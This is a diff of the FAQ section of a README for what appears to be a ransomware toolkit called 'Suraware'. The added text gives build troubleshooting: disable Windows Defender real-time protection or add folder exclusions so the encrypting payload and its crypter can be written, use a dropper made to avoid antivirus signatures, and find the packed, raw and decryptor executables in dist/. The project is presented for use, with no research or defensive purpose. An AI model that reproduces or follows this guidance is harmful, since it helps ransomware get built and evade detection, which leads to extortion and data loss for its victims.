NeedHotWaifus/Suraware/README.md

 A: No. ChaCha20 and ECIES are cryptographically secure.
 Without the private key, decryption is mathematically impossible.

 **Q: Why does Windows Defender block the build?**
 A: Defender uses heuristic detection.
-When Go compiles ChaCha20 + file traversal, it matches ransomware patterns.
-The dropper architecture solves this.
+When Go compiles ChaCha20 + file traversal, it matches ransomware patterns. **Solution:** Run Build.bat as Administrator to add Defender exclusions, or temporarily disable Real-time Protection.

+**Q: Build fails with "Access is denied" when packing?**
+A: Windows Defender is blocking the packed executable write. **Solutions:**
+1. Run Build.bat as Administrator (recommended)
+2. Temporarily disable Real-time Protection
+3. Add folder exclusion: Settings → Virus & Threat Protection → Exclusions → Add this folder
+4. The Crypter now has a fallback to write to temp directory - check there if direct write fails

+**Q: Dropper build fails - is this normal?**
+A: Yes, the dropper build may fail due to Go build environment issues.
+This is fine - the build system will continue and you can use `dist/Sura-Packed.exe` directly, which is already packed and encrypted.

+**Q: Build fails with temp directory errors?**
+A: This has been fixed in v2.1.
+The build system now builds directly to the `dist/` folder instead of using complex temp directory methods.

+**Q: Where are the output files?**
+A: All executables are in the `dist/` folder: `Sura-Built.exe` (raw), `Sura-Packed.exe` (packed), `Sura-Dropper.exe` (optional), and `Decryptor-Built.exe` (decryption tool).

 **Q: Will antivirus detect the dropper?**
 A: The dropper should compile cleanly because it contains no ransomware code.
 However, signatures may eventually be added after public release.